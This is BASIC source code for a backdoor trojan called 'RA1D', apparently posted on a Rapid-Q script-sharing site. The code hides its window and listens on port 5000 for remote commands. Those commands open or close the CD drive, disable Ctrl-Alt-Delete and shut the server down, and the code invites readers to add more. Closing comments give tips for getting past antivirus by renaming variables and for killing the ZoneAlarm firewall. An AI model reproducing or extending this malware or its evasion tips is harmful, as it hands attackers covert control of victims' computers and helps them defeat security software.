' Rapid-Q by William Yu (c)1999-2000 . ' ================================================================================ ' Upload_il_tuo_script_su_Rapidq.it ' Rad_trojan 'RA1D v0.0.1 - The First EVER? Cross-Platform BackDoor Trojan !' 'Introductory Application Model by Digital Vampire dv@knac.com' 'www.ukhack.com | www.basicguru.com/abc/rapidq/ (Freeware)' 'as this version is to serve as an Introductory Application Model 'it only consists of a windows based payload. 'their are plans to make future releases fully unix and solaris 'compatible, but at the moment i do not have machines to test 'this code on in that environment. 'and as such, I only tested with the win32 compiler. 'since the compiler for this language "rapid-q" is cross-platform, 'i am sure it can be done with a few minor tweaks to this model. 'time however, is not on my side. 'Just for the record - Rapid Q is Free, Cross Platform and on win32 'creates fully self contained, win 32 native exe's that utilise 'UPX compression technology to keep it's filesize down to 'an absolute bare minimum. Zero Cost, Zero OverHeads, Zero 'DLL Dependencies ........ What more could you ask for ??? 'have fun .. dv. $APPTYPE GUI $TYPECHECK ON $INCLUDE "RAPIDQ.INC" DECLARE FUNCTION SystemParametersInfo LIB "user32" ALIAS "SystemParametersInfoA" (ByVal uAction As Lo ng, ByVal uParam As Long, ByVal lpvParam As String, ByVal fuWinIni As Long) As Long DECLARE FUNCTION mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long DIM Sock AS INTEGER DIM Connected AS LONG DIM Form AS QForm Form.BorderStyle = bsNone Form.Width = 0 Form.Height = 0 Form.Enabled = True Form.Visible = False CONST DELAY = 500 ' In Milliseconds CONST PortNum = 5000 ' Anything above 1024 should work, with some exceptions DECLARE SUB TimerExpired DIM Socket AS QSocket DIM Timer1 AS QTimer DIM MasterSocket AS INTEGER, NumClients AS INTEGER DIM Client(1 TO 50) AS INTEGER Timer1.Interval = DELAY ' Some Delay between checks ' Don't want to become a CPU hog Timer1.OnTimer = TimerExpired NumClients = 0 MasterSocket = Socket.Open(PortNum) SUB SwapClients(N AS INTEGER) '-- Get rid of disconnected client DIM I AS INTEGER FOR I = N to NumClients Client(I) = Client(I+1) NEXT END SUB SUB SendToClient (Message AS STRING,CLID as Integer) Dim N as integer N = Socket.WriteLine(Client(CLID), Message) END SUB SUB TimerExpired DIM I AS INTEGER DIM S AS STRING Timer1.Enabled = False Timer1.Interval = DELAY ' Restore delay IF Socket.ConnectionReady(MasterSocket) > 0 THEN NumClients = NumClients + 1 Client(NumClients) = Socket.Accept(MasterSocket) IF Socket.WriteLine(Client(NumClients), "RA1D 0.0.1 - WELCOME. TYPE 'HELP' FOR COMMAND LIST"+C hr$(13)) = -1 THEN NumClients = NumClients - 1 END IF END IF FOR I = 1 to NumClients '' Check for ready clients IF Socket.IsClientReady(MasterSocket, Client(I)) > 0 THEN S = Socket.ReadLine(Client(I)) IF Socket.Transferred = -1 THEN NumClients = NumClients - 1 SwapClients(I) ELSE Dim X as String IF LEN(s) > 3 then X = UCASE$(MID$(S,1,3)) '-- returns ll Dim Retvalue as Long Dim ReturnString as String Dim G as Integer Dim Xy as Integer Dim Sn as String Dim MSG as String IF X = "OCD" then retvalue = mcisendstring("set CDAudio door open", returnstring, 127, 0) SendToClient("CD DRIVE OPENED"+Chr$(13),I) End If IF X = "CCD" then retvalue = mcisendstring("set CDAudio door closed", returnstring, 127, 0) SendToClient("CD DRIVE CLOSED"+Chr$(13),I) End If IF X = "KLS" then End End If 'Add more 3 Byte Commands here. X = UCASE$(MID$(S,1,4)) '4 byte Commands ;) if X = "HELP" then SendToClient("RA1D COMMANDS SUPPORTED "+Chr$(13),I) SendToClient("KLS [K]i[L]l [S]erver : Kills the Current Server."+Chr$(13), I) SendToClient("OCD [O]pen [C]D [D]rive : Opens The CD Rom Drive"+Chr$(13), I) SendToClient("CCD [C]lose [C]D [D]rive : Closes The CD Rom Drive"+Chr$(13 ),I) SendToClient("DDEL [D]isable CTRL-ALT-[D]el : Disables CTRL-ALT-DELETE"+C hr$(13),I) SendToClient("EDEL [E]nable CTRL-ALT-[D]el : Enables CTRL-ALT-DELETE"+Chr $(13),I) 'if you've added more commands it'd be a neat 'idea to include them here also :) end if IF X = "DDEL" then RetValue = SystemParametersInfo(97, 1, 1, 0) SendToClient("CTRL-ALT-DEL DISABLED"+Chr$(13),I) end if IF X = "EDEL" then RetValue = SystemParametersInfo(97, 0, 1, 0) SendToClient("CTRL-ALT-DEL ENABLED"+Chr$(13),I) end if 'add more 4 byte commands here END IF END IF END IF NEXT Timer1.Enabled = True END SUB DO DoEvents '-- Process events LOOP 'just so that the invisible "form" dosen't terminate itself. 'tip if you want to "defeat" anti-virus software just change a 'variable name or two(program wide, obviously ;) then re-compile. 'ZoneAlarm ? - Just use a few API window detection routines 'and either kill ZA, or "null" the Socket Routines on App start, 'OBVIOUSLY before the SocketRoutines are implemented. 'Have Fun. ' =============================================================================== ' 2003 Holyguard.net - 2007_Abruzzoweb